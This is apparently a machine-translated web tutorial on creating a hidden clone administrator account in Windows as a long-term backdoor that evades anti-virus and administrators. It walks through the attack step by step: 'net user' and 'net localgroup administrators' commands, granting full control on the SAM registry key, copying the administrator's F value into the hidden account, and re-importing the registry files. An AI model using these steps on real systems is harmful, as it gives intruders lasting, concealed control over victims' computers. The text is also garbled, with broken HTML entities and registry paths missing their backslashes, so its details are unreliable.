How to manually clone the Windows operating system hidden account

When a hacker invades a target, he often leaves a back door to control the computer for a long time. However, the back door is ultimately a hacking tool, which is one of the targets of anti-virus software. After the anti-virus software is upgraded, the back door is deleted. But there is a kind of backdoor that will never be killed by anti-virus software, that is, a hidden system clone account.


Xiao Bian Tip: clone account is the most hidden back door in Windows, each account in the registry has a corresponding key, this key affects the rights of the account. When the hacker copies the key value in the registry, he can clone the account with one user right into an account with administrator rights and hide the account. Hidden accounts are invisible both in “user management" or "command prompt". Therefore, general computer administrators rarely find hidden accounts, and the harm is enormous.


1 add the command line mode account click on the & ldquo; start & rdquo; & rarr; & ldquo; run & rdquo ;, enter & ldquo; cmd & rdquo; run & ldquo; a command prompt & rdquo ;, enter the following command: net user Test$ /add and hit enter, so you can create an account called test$ in the system. Continue typing: net localgroup administrators test$ /add and press Enter, which will raise the test$ account to administrator privileges.

2 add a hidden account Step 01 Click & ldquo; start & rdquo; & rarr; & ldquo; & rdquo ;, run input & ldquo; regedt32.exe & rdquo; after the carriage return, the pop-up & ldquo; & rdquo ;. Registry Editor In regedt32.exe, go to “HKEY_LOCAL_MACHINESAMSAM”, click “Edit"Menu →“Permissions", in the pop-up "SAM Permissions" edit window, select "administrators" account, below Check the full control of the permission settings, click on & rdquo; OK “

3 set registry operating authority Step 02 in & rdquo; run & ldquo; Enter & rdquo; regedit.exe & ldquo; run & rdquo; Registry Editor & ldquo ;, locate & rdquo; HKEY_LOCAL_MACHINESAMSAMDomainsAccountUsersNames & ldquo; at, click to hide the account & rdquo ;test$“, the type of the key value displayed on the right side of the "type" is displayed as 0x404, up to "HKEY_LOCAL_MACHINESAMSAMDomainsAccountUsers", you can find the ” 00000404“ this item, the two are mutually corresponding All information for the hidden account "test$“ is in the “00000404“ Similarly, we can find the account corresponding to the ”administrator“ account is ”000001F4“.

Step 03 exports the key value of "test$“ to test$.reg, and exports the F key values ​​of the ”00000404“ and ”000001F4“ items to user.reg, admin. Reg. Use ”Notepad“Open admin.reg, copy the contents of the "F“ value", replace the "." value in user.reg, save the 4 to find the hidden account corresponding key value Step 04 In the "command prompt" in the "net user test$ /del“ command, delete the hidden account we created. Don't be nervous, this step just deletes the hidden account & quoquo; empty shell & ldquo;, just like the cleanup after the invasion, the hidden account is not changed. Finally, we double-click the two registry files test$.reg and user.reg and import them into the registry and you're done.